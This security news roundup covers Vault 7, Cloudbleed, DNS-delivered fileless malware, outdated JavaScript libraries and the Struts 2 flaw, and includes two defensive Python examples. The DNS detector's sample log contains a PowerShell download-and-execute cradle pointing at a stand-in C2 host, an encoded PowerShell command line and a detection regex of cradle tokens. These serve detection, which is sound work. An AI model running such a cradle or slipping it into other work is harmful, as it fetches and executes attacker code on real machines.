News
WikiLeaks publishes Vault 7, collection of alleged CIA hacking tools
WikiLeaks has published a large collection of documents describing hacking tools it attributes to the CIA. At the time of writing the dump contains only documentation, not the malware or exploits themselves. Their original announcement can be found here.
Cloudbleed triggered 1.2M times, damage kept to minimum
A look at the impact of the 'CloudBleed' vulnerability.
HackerOne offers open source projects free access to platform
HackerOne, the bug bounty platform, now offers its service free of charge to open-source projects. To be eligible, a project must be at least three months old, active, and covered by an Open Source Initiative (OSI) approved license.
New fileless malware uses DNS queries to receive PowerShell commands
A newly analysed piece of malware uses DNS as its command-and-control channel. It establishes itself in several stages and fetches PowerShell scripts stored in DNS TXT records, never writing a payload to disk. Because there is no file for antivirus to scan, it has to be caught at the process or DNS-logging level instead.
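As an added example (not code from the article or from the published malware analysis), the heuristics below run over constructed DNS query-log lines in an assumed "timestamp client qtype qname answer" format and flag TXT answers that decode to a PowerShell download cradle, that are long and high-entropy, or that a single client keeps pulling from one zone. The log format, sample lines, domain names and thresholds are all assumptions made for the example.

```python
"""Heuristics for spotting PowerShell stagers delivered in DNS TXT answers.

Added example, not code from the original article or from the published
malware analysis. The log format ("timestamp client qtype qname answer")
and all sample lines below are constructed; adapt parse_log() to your
resolver's actual log format.
"""
import base64
import binascii
import math
import re
from collections import Counter

# Tokens typical of PowerShell download cradles that should not appear in
# legitimate TXT data (SPF, DMARC, DKIM, domain-verification strings).
POWERSHELL_MARKERS = re.compile(
    r"(?i)(?<!\w)(iex|invoke-expression|invoke-webrequest|downloadstring|"
    r"frombase64string|powershell(?:\.exe)?|-enc(?:odedcommand)?|-nop)(?!\w)"
)
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")


def parse_log(text):
    """Parse constructed 'timestamp client qtype qname answer' lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qtype, qname, answer = m.groups()
        records.append({"ts": ts, "client": client, "qtype": qtype.upper(),
                        "qname": qname.lower().rstrip("."),
                        "answer": answer.strip().strip('"')})
    return records


def shannon_entropy(s):
    """Bits per character: base64 blobs sit near 5-6, SPF/DMARC text near 3-4."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decodings(answer):
    """The raw answer plus, if it is valid base64, its UTF-8 and UTF-16LE
    decodings (PowerShell -EncodedCommand payloads are UTF-16LE)."""
    out = [answer]
    try:
        raw = base64.b64decode(answer, validate=True)
    except (binascii.Error, ValueError):
        return out
    out.append(raw.decode("utf-8", errors="ignore"))
    out.append(raw.decode("utf-16-le", errors="ignore"))
    return out


def classify_txt(rec, min_len=64, entropy_threshold=4.5):
    """Return the reasons a TXT answer looks like a C2 payload ([] if benign)."""
    reasons = []
    if rec["qtype"] != "TXT":
        return reasons
    for text in decodings(rec["answer"]):
        m = POWERSHELL_MARKERS.search(text)
        if m:
            reasons.append("powershell marker %r" % m.group(0))
            break
    ans = rec["answer"]
    ent = shannon_entropy(ans)
    if len(ans) >= min_len and ent >= entropy_threshold:
        reasons.append("long high-entropy answer (%d chars, %.2f bits/char)"
                       % (len(ans), ent))
    return reasons


def find_suspicious(records):
    """(client, qname, reasons) for every TXT answer that trips a heuristic."""
    hits = []
    for rec in records:
        reasons = classify_txt(rec)
        if reasons:
            hits.append((rec["client"], rec["qname"], reasons))
    return hits


def txt_volume(records, labels=2):
    """Count TXT queries per (client, zone): a host repeatedly pulling TXT
    records from one zone is the stage-by-stage fetch described above."""
    counts = Counter()
    for rec in records:
        if rec["qtype"] == "TXT":
            zone = ".".join(rec["qname"].split(".")[-labels:])
            counts[(rec["client"], zone)] += 1
    return counts


# Constructed sample: a stage-2 cradle, base64-encoded into a TXT answer,
# next to ordinary DMARC/SPF records that must not be flagged.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/stage2.ps1')"
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_LOG = f"""\
2017-03-05T10:00:01Z 10.0.0.12 A www.example.com 93.184.216.34
2017-03-05T10:00:02Z 10.0.0.12 TXT _dmarc.example.com "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
2017-03-05T10:00:03Z 10.0.0.12 TXT example.com "v=spf1 include:_spf.example.com ~all"
2017-03-05T10:00:05Z 10.0.0.23 TXT 7f3a.cdn-update.example.net "{ENCODED_STAGE2}"
2017-03-05T10:00:09Z 10.0.0.23 TXT 7f3b.cdn-update.example.net "powershell -nop -w hidden -enc SQBFAFgA"
"""

if __name__ == "__main__":
    for client, qname, reasons in find_suspicious(parse_log(SAMPLE_LOG)):
        print(client, qname, "; ".join(reasons))
```

The marker list and the entropy threshold are starting points, not a signature: legitimate DKIM records are also long base64 blobs, so pair the entropy rule with the per-client volume count rather than alerting on it alone, and feed the script from resolver-level logs (for example Zeek's dns.log), since the endpoint itself never sees a file.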
Google Open Source Blog: Operation Rosehub
A great story of how 50 Google employees banded together to patch every open-source project on GitHub that was still vulnerable to the "Mad Gadget" vulnerability, a remote code execution bug that recently hit the San Francisco Metro system. Over 2,600 projects received a pull request to fix the issue.
Thou shalt not depend on me: analysing the use of outdated JavaScript libraries on the web
It is not surprising that a huge number of sites use one or more JavaScript libraries with known vulnerabilities. This paper measures how bad it actually is.
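The check a site owner can run for themselves is a version audit of script includes. The code below is an added example, not code from the paper: it pulls every script src out of a constructed sample page, recognises two common URL shapes that carry a library version, and compares the version against a minimum-version table. That table is a constructed policy placeholder, not a vulnerability database; in practice it would be populated from retire.js's repository data or an advisory feed.

```python
"""Flag versioned JavaScript library includes that fall below a minimum version.

Added example, not code from the paper. The threshold table and the sample
page are constructed for the example; the table is a policy placeholder,
not a vulnerability database (feed it from retire.js's repository data or
your own advisory feed).
"""
import re
from html.parser import HTMLParser

# Constructed policy thresholds: the oldest accepted version of each library.
MINIMUM_VERSIONS = {
    "jquery": (3, 0, 0),
    "angular": (1, 6, 0),
    "bootstrap": (3, 4, 0),
}

LIBS = r"jquery|angular|bootstrap"
# Two common ways a version ends up in a script URL:
#   .../bootstrap-3.3.7.min.js                 (version in the file name)
#   .../libs/angular.js/1.6.4/angular.min.js   (version as a CDN path segment)
VERSION_PATTERNS = [
    re.compile(r"/(?P<lib>%s)[.-](?P<ver>\d+(?:\.\d+)+)(?:[./-]|$)" % LIBS, re.I),
    re.compile(r"/(?P<lib>(?:%s)(?:\.js)?)/(?P<ver>\d+(?:\.\d+)+)/" % LIBS, re.I),
]


class ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def parse_version(ver):
    """'1.8.3' -> (1, 8, 3), so versions compare as tuples."""
    return tuple(int(part) for part in ver.split("."))


def identify(src):
    """(library, version tuple) if the URL names a versioned library, else None."""
    for pattern in VERSION_PATTERNS:
        m = pattern.search(src)
        if m:
            lib = m.group("lib").lower()
            if lib.endswith(".js"):
                lib = lib[:-3]
            return lib, parse_version(m.group("ver"))
    return None


def audit_html(html, minimums=MINIMUM_VERSIONS):
    """Split script includes into outdated, ok and unidentified."""
    parser = ScriptSrcParser()
    parser.feed(html)
    report = {"outdated": [], "ok": [], "unidentified": []}
    for src in parser.srcs:
        ident = identify(src)
        if ident is None:
            # Bundled, renamed or unversioned copies land here. This is the
            # blind spot of URL-based detection: a vulnerable library inside
            # app.bundle.js is invisible to this check.
            report["unidentified"].append(src)
            continue
        lib, ver = ident
        entry = {"src": src, "library": lib, "version": ver}
        minimum = minimums.get(lib)
        if minimum is not None and ver < minimum:
            entry["minimum"] = minimum
            report["outdated"].append(entry)
        else:
            report["ok"].append(entry)
    return report


# Constructed sample page: two outdated includes, one acceptable, one bundle.
SAMPLE_HTML = """\
<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script src="/static/js/bootstrap-3.3.7.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.4/angular.min.js"></script>
<script src="/static/js/app.bundle.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for entry in audit_html(SAMPLE_HTML)["outdated"]:
        print("OUTDATED", entry["library"], entry["version"], "<", entry["minimum"], entry["src"])
    for src in audit_html(SAMPLE_HTML)["unidentified"]:
        print("UNIDENTIFIED", src)
```

The unidentified bucket is the important one: anything concatenated into a bundle or served under a renamed path needs content fingerprinting (hashing known release files, as retire.js does) rather than URL matching, which is why scans of this kind undercount rather than overcount.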
DHS funding new round of IoT cyber startups with total of $1M award
The Department of Homeland Security has awarded $200,000 each to five startups with promising IoT security technology. They will be guided through the further steps of building out their proofs of concept into full products.
Pentagon launches open-source experiment
The US Defence Department has launched code.mil, a website that will be used to host unclassified code written by the department, and which will be free to use for personal or public projects.
Apple pushing two-factor authentication for iOS 10.3 users
Apple seems to be nudging users more explicitly to enable two-factor authentication (2FA) in the latest iOS version, which is currently in beta.
Apache servers under attack through easily exploitable Struts 2 flaw
Despite the headline, this concerns Apache Struts 2, the Java web application framework, not the Apache HTTP Server. Struts 2 has a critical remote code execution vulnerability (CVE-2017-5638, fixed in Struts 2.3.32 and 2.5.10.1) that is being exploited in the wild. Patching is advised.
In Appreciation: Howard A. Schmidt
Howard Schmidt, who was the top cybersecurity advisor for both Bush and Obama, has passed away. Reading about what he did and what kind of person he was, he will clearly be missed.